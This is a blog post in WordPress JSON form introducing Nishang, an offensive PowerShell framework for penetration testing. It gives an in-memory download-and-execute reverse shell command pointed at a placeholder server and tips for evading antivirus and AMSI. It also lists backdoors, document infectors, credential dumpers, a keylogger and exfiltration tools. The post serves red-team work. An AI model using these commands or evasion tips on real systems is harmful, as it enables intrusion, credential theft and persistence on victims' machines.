{"id":10662,"date":"2020-05-29T21:05:12","date_gmt":"2020-05-29T15:35:12","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=10662"},"modified":"2020-05-29T21:05:12","modified_gmt":"2020-05-29T15:35:12","slug":"nishang","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/nishang\/","title":{"rendered":"Nishang : Offensive PowerShell For Red Team, Penetration Testing &#038; Offensive Security"},"content":{"rendered":"\n<p><strong>Nishang <\/strong>is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Usage<\/strong><\/p>\n\n\n\n<p>Import all the scripts in the current PowerShell session (PowerShell v3 onwards).<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">PS C:\\nishang&gt; Import-Module .\\nishang.psm1<\/p>\n\n\n\n<p>Use the individual scripts with dot sourcing.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; . C:\\nishang\\Gather\\Get-Information.ps1 <br>PS C:\\nishang&gt; Get-Information<\/strong><\/p>\n\n\n\n<p>To get help about any script or function, use:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; Get-Help [scriptname] -full<\/strong><\/p>\n\n\n\n<p>Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.<\/p>\n\n\n\n<p>For example, to see the help about Get-WLAN-Keys.ps1, use<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; . C:\\nishang\\Get-WLAN-Keys.ps1 <br>PS C:\\nishang&gt; Get-Help Get-WLAN-Keys -Full<\/strong><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Anti Virus<\/strong><\/p>\n\n\n\n<p>Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:<\/p>\n\n\n\n<p>Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">powershell iex (New-Object Net.WebClient).DownloadString(&#8216;http:\/\/&lt;yourwebserver&gt;\/Invoke-PowerShellTcp.ps1&#8217;);Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]<\/p>\n\n\n\n<p>Method 2. Use the <strong><code>-encodedcommand<\/code> (or <code>-e<\/code>)<\/strong> parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) <code><strong>\"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]\"<\/strong><\/code>.<\/p>\n\n\n\n<p>Encode the scrript using Invoke-Encode from Nishang:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>PS C:\\nishang&gt; . \\nishang\\Utility\\Invoke-Encode <br><br>PS C:\\nishang&gt; Invoke-Encode -DataToEncode C:\\nishang\\Shells\\Invoke-PowerShellTcp.ps1 -OutCommand<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Encoded data written to .\\encoded.txt<\/li><li>Encoded command written to .\\encodedcommand.txt<\/li><\/ul>\n\n\n\n<p>From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>C:\\Users\\target&gt; powershell -e [encodedscript]<\/strong><\/p>\n\n\n\n<p>If the scripts still get detected changing the function and parameter names and removing the help content will help.<\/p>\n\n\n\n<p>In case Windows 10&#8217;s AMSI is still blocking script execution, see this blog: <a href=\"http:\/\/www.labofapenetrationtester.com\/2016\/09\/amsi.html\">http:\/\/www.labofapenetrationtester.com\/2016\/09\/amsi.html<\/a><\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>Also Read &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/clipboardme\/\" target=\"_blank\" rel=\"noreferrer noopener\">Clipboardme : Grab &amp; Inject Clipboard Content By Link<\/a><\/strong><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Scripts<\/strong><\/p>\n\n\n\n<p>Nishang currently contains the following scripts and payloads.<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Active Directory<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/ActiveDirectory\/Set-DCShadowPermissions.ps1\">Set-DCShadowPermissions<\/a><ul><li>Modify AD objects to provide minimal permissions required for DCShadow.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Antak &#8211; the Webshell<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/tree\/master\/Antak-WebShell\">Antak<\/a><ul><li>Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Backdoors<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/HTTP-Backdoor.ps1\">HTTP-Backdoor<\/a><ul><li>A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/DNS_TXT_Pwnage.ps1\">DNS_TXT_Pwnage<\/a><ul><li>A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Execute-OnTime.ps1\">Execute-OnTime<\/a><ul><li>A backdoor which can execute PowerShell scripts at a given time on a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Gupt-Backdoor.ps1\">Gupt-Backdoor<\/a><ul><li>A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Add-ScrnSaveBackdoor.ps1\">Add-ScrnSaveBackdoor<\/a><ul><li>A backdoor which can use Windows screen saver for remote command and script execution.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Invoke-ADSBackdoor.ps1\">Invoke-ADSBackdoor<\/a><ul><li>A backdoor which can use alternate data streams and Windows Registry to achieve persistence.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Add-RegBackdoor.ps1\">Add-RegBackdoor<\/a><ul><li>A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Set-RemoteWMI.ps1\">Set-RemoteWMI<\/a><ul><li>Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Backdoors\/Set-RemotePSRemoting.ps1\">Set-RemotePSRemoting<\/a><ul><li>Modify permissions of PowerShell remoting to allow access to a non-admin user.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Bypass<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Bypass\/Invoke-AmsiBypass.ps1\">Invoke-AmsiBypass<\/a><ul><li>Implementation of publicly known methods to bypass\/avoid AMSI.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Client<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-CHM.ps1\">Out-CHM<\/a><ul><li>Create infected CHM files which can execute PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Word.ps1\">Out-Word<\/a><ul><li>Create Word files and infect existing ones to run PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Excel.ps1\">Out-Excel<\/a><ul><li>Create Excel files and infect existing ones to run PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-HTA.ps1\">Out-HTA<\/a><ul><li>Create a HTA file which can be deployed on a web server and used in phishing campaigns.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Java.ps1\">Out-Java<\/a><ul><li>Create signed JAR files which can be used with applets for script and command execution.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-Shortcut.ps1\">Out-Shortcut<\/a><ul><li>Create shortcut files capable of executing PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-WebQuery.ps1\">Out-WebQuery<\/a><ul><li>Create IQY files for phishing credentials and SMB hashes.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-JS.ps1\">Out-JS<\/a><ul><li>Create JS files capable of executing PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-SCT.ps1\">Out-SCT<\/a><ul><li>Create SCT files capable of executing PowerShell commands and scripts.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Client\/Out-SCF.ps1\">Out-SCF<\/a><ul><li>Create a SCF file which can be used for capturing NTLM hash challenges.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Escalation<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Escalation\/Enable-DuplicateToken.ps1\">Enable-DuplicateToken<\/a><ul><li>When SYSTEM privileges are required.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Escalation\/Remove-Update.ps1\">Remove-Update<\/a><ul><li>Introduce vulnerabilities by removing patches.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Escalation\/Invoke-PsUACme.ps1\">Invoke-PsUACme<\/a><ul><li>Bypass UAC.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Execution<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Download-Execute-PS.ps1\">Download-Execute-PS<\/a><ul><li>Download and execute a PowerShell script in memory.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Download_Execute.ps1\">Download_Execute<\/a><ul><li>Download an executable in text format, convert it to an executable, and execute.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Execute-Command-MSSQL.ps1\">Execute-Command-MSSQL<\/a><ul><li>Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Execute-DNSTXT-Code.ps1\">Execute-DNSTXT-Code<\/a><ul><li>Execute shellcode in memory using DNS TXT queries.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Execution\/Out-RundllCommand.ps1\">Out-RundllCommand<\/a><ul><li>Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Gather<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Check-VM.ps1\">Check-VM<\/a><ul><li>Check for a virtual machine.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Copy-VSS.ps1\">Copy-VSS<\/a><ul><li>Copy the SAM file using Volume Shadow Copy Service.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Credentials.ps1\">Invoke-CredentialsPhish<\/a><ul><li>Trick a user into giving credentials in plain text.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/FireBuster.ps1\">FireBuster<\/a> <a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/FireListener.ps1\">FireListener<\/a><ul><li>A pair of scripts for egress testing<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-Information.ps1\">Get-Information<\/a><ul><li>Get juicy information from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-LSASecret.ps1\">Get-LSASecret<\/a><ul><li>Get LSA Secret from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-PassHashes.ps1\">Get-PassHashes<\/a><ul><li>Get password hashes from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-WLAN-Keys.ps1\">Get-WLAN-Keys<\/a><ul><li>Get WLAN keys in plain text from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Keylogger.ps1\">Keylogger<\/a><ul><li>Log keystrokes from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-MimikatzWDigestDowngrade.ps1\">Invoke-MimikatzWdigestDowngrade<\/a><ul><li>Dump user passwords in plain on Windows 8.1 and Server 2012<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Get-PassHints.ps1\">Get-PassHints<\/a><ul><li>Get password hints of Windows users from a target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Show-TargetScreen.ps1\">Show-TargetScreen<\/a><ul><li>Connect back and Stream target screen using MJPEG.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-Mimikatz.ps1\">Invoke-Mimikatz<\/a><ul><li>Load mimikatz in memory. Updated and with some customisation.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-Mimikittenz.ps1\">Invoke-Mimikittenz<\/a><ul><li>Extract juicy information from target process (like browsers) memory using regex.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-SSIDExfil.ps1\">Invoke-SSIDExfil<\/a><ul><li>Exfiltrate information like user credentials, using WLAN SSID.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Gather\/Invoke-SessionGopher.ps1\">Invoke-SessionGopher<\/a><ul><li>Identify admin jump-boxes and\/or computers used to access Unix machines.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>MITM<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/MITM\/Invoke-Interceptor.ps1\">Invoke-Interceptor<\/a><ul><li>A local HTTPS proxy for MITM attacks.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Pivot<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Pivot\/Create-MultipleSessions.ps1\">Create-MultipleSessions<\/a><ul><li>Check credentials on multiple computers and create PSSessions.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Pivot\/Run-EXEonRemote.ps1\">Run-EXEonRemote<\/a> <ul><li>Copy and execute an executable on multiple machines.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Pivot\/Invoke-NetworkRelay.ps1\">Invoke-NetworkRelay<\/a> <ul><li>Create network relays between computers.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Prasadhak<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Prasadhak\/Prasadhak.ps1\">Prasadhak<\/a><ul><li>Check running hashes of running process against the VirusTotal database.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Scan<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Scan\/Brute-Force.ps1\">Brute-Force<\/a><ul><li>Brute force FTP, Active Directory, MSSQL, and Sharepoint.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Scan\/Port-Scan.ps1\">Port-Scan<\/a><ul><li>A handy port scanner.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Powerpreter<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/tree\/master\/powerpreter\">Powerpreter<\/a><ul><li>All the functionality of nishang in a single script module.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Shells<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PsGcat.ps1\">Invoke-PsGcat<\/a><ul><li>Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PsGcatAgent.ps1\">Invoke-PsGcatAgent<\/a><ul><li>Execute commands and scripts sent by Invoke-PsGcat.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\">Invoke-PowerShellTcp<\/a><ul><li>An interactive PowerShell reverse connect or bind shell<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcpOneLine.ps1\">Invoke-PowerShellTcpOneLine<\/a><ul><li>Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcpOneLineBind.ps1\">Invoke-PowerShellTcpOneLineBind<\/a><ul><li>Bind version of Invoke-PowerShellTcpOneLine.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellUdp.ps1\">Invoke-PowerShellUdp<\/a><ul><li>An interactive PowerShell reverse connect or bind shell over UDP<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellUdpOneLine.ps1\">Invoke-PowerShellUdpOneLine<\/a><ul><li>Stripped down version of Invoke-PowerShellUdp.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PoshRatHttps.ps1\">Invoke-PoshRatHttps<\/a><ul><li>Reverse interactive PowerShell over HTTPS.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PoshRatHttp.ps1\">Invoke-PoshRatHttp<\/a><ul><li>Reverse interactive PowerShell over HTTP.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Remove-PoshRat.ps1\">Remove-PoshRat<\/a><ul><li>Clean the system after using Invoke-PoshRatHttps<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellWmi.ps1\">Invoke-PowerShellWmi<\/a><ul><li>Interactive PowerShell using WMI.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellIcmp.ps1\">Invoke-PowerShellIcmp<\/a><ul><li>An interactive PowerShell reverse shell over ICMP.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-JSRatRundll.ps1\">Invoke-JSRatRundll<\/a><ul><li>An interactive PowerShell reverse shell over HTTP using rundll32.exe.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-JSRatRegsvr.ps1\">Invoke-JSRatRegsvr<\/a><ul><li>An interactive PowerShell reverse shell over HTTP using regsvr32.exe.<\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Utility<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Add-Exfiltration.ps1\">Add-Exfiltration<\/a><ul><li>Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Add-Persistence.ps1\">Add-Persistence<\/a><ul><li>Add reboot persistence capability to a script.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Remove-Persistence.ps1\">Remove-Persistence<\/a><ul><li>Remote persistence added by the Add-Persistence script.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Do-Exfiltration.ps1\">Do-Exfiltration<\/a><ul><li>Pipe (|) this to any script to exfiltrate the output.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Download.ps1\">Download<\/a><ul><li>Transfer a file to the target.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Parse_Keys.ps1\">Parse_Keys<\/a><ul><li>Parse keys logged by the keylogger.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Invoke-Decode.ps1\">Invoke-Encode<\/a><ul><li>Encode and compress a script or string.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Invoke-Decode.ps1\">Invoke-Decode<\/a><ul><li>Decode and decompress a script or string from Invoke-Encode.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Start-CaptureServer.ps1\">Start-CaptureServer<\/a><ul><li>Run a web server which logs Basic authentication and SMB hashes.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/ConvertTo-ROT13.ps1\">ConvertTo-ROT13<\/a><ul><li>Encode a string to ROT13 or decode a ROT13 string.<\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Utility\/Out-DnsTxt.ps1\">Out-DnsTxt<\/a><ul><li>Generate DNS TXT records which could be used with other scripts.<\/li><\/ul><\/li><li>[Base64ToString]<\/li><li>[StringToBase64]<\/li><li>[ExetoText]<\/li><li>[TexttoExe]<\/li><\/ul>\n\n\n\n<div class=\"wp-block-buttons aligncenter is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/samratashok\/nishang\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Usage Import all the scripts in the current PowerShell session (PowerShell v3 onwards). PS C:\\nishang&gt; Import-Module .\\nishang.psm1 Use the individual scripts with dot [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16326,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png","fifu_image_alt":"Nishang : Offensive PowerShell For Red Team, Penetration Testing & Offensive Security","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[2257,2467,2577,2768,2998],"class_list":["post-10662","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-nishang","tag-penetration-testing","tag-powershell","tag-red-team","tag-security"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Nishang :Red Team, Penetration Testing &amp; Offensive Security<\/title>\n<meta name=\"description\" content=\"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/nishang\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nishang :Red Team, Penetration Testing &amp; Offensive Security\" \/>\n<meta property=\"og:description\" content=\"Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/nishang\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-29T15:35:12+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-xliKR-4Va70\/XsjY7ir5C-I\/AAAAAAAAGck\/L1ypn0Nd5jwfdREnsUqGJStrI77M3FpLQCLcBGAsYHQ\/s1600\/nishang%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/nishang\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Nishang : Offensive PowerShell For Red Team, Penetration Testing &#038; Offensive 